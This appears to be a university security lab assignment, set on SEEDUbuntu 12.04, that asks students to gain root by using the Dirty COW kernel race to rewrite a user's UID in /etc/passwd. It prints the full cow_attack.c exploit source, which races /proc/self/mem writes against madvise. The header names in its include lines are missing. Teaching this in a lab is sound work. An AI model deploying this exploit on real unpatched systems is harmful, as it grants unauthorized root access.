(Using SEEDUbuntu12.04)

This assignment you should turn this normal user into a root user using the Dirty COW attack.

Adding a new account can be achieved using the adduser command. After the account is created, a new record will be added to /etc/passwd. See the following: $ sudo adduser (create new normal user) $ cat /etc/passwd | grep :x:1001:1001:,,,:/home/:/bin/bash

We suggest that you save a copy of the /etc/passwd file just in case you make a mistake and corrupt this file.

Clue: You need to modify the new users entry in /etc/passwd, so the third field is changed to 0000. The file is not writable to the new user, but we can use the Dirty COW attack to write to this file. You shall modify the cow_attack.c to achieve this goal. If your attack is successful, you will be able to notice something unusual and interesting when you switch user to user: . seed@ubuntu$ su (Switch user) Passwd: Use the command id in the command line to see the user privileges.

cow_attack.c file

#include #include #include #include #include

void *map; void *writeThread(void *arg); void *madviseThread(void *arg);

int main(int argc, char *argv[]) { pthread_t pth1,pth2; struct stat st; int file_size;

// Open the target file in the read-only mode. int f=open("/zzz", O_RDONLY);

// Map the file to COW memory using MAP_PRIVATE. fstat(f, &st); file_size = st.st_size; map=mmap(NULL, file_size, PROT_READ, MAP_PRIVATE, f, 0);

// Find the position of the target area char *position = strstr(map, "222222");

// We have to do the attack using two threads. pthread_create(&pth1, NULL, madviseThread, (void *)file_size); pthread_create(&pth2, NULL, writeThread, position);

// Wait for the threads to finish. pthread_join(pth1, NULL); pthread_join(pth2, NULL); return 0; }

void *writeThread(void *arg) { char *content= "******"; off_t offset = (off_t) arg;

int f=open("/proc/self/mem", O_RDWR); while(1) { // Move the file pointer to the corresponding position. lseek(f, offset, SEEK_SET); // Write to the memory. write(f, content, strlen(content)); } }

void *madviseThread(void *arg) { int file_size = (int) arg; while(1){ madvise(map, file_size, MADV_DONTNEED); } }

You need to submit a detailed lab report to describe what you have done and what you have observed . Include a brief explanation of the cow_attack.c code used in both exercises. Please provide details using screen shots and code snippets. You also need to provide explanation to the observations that are interesting or surprising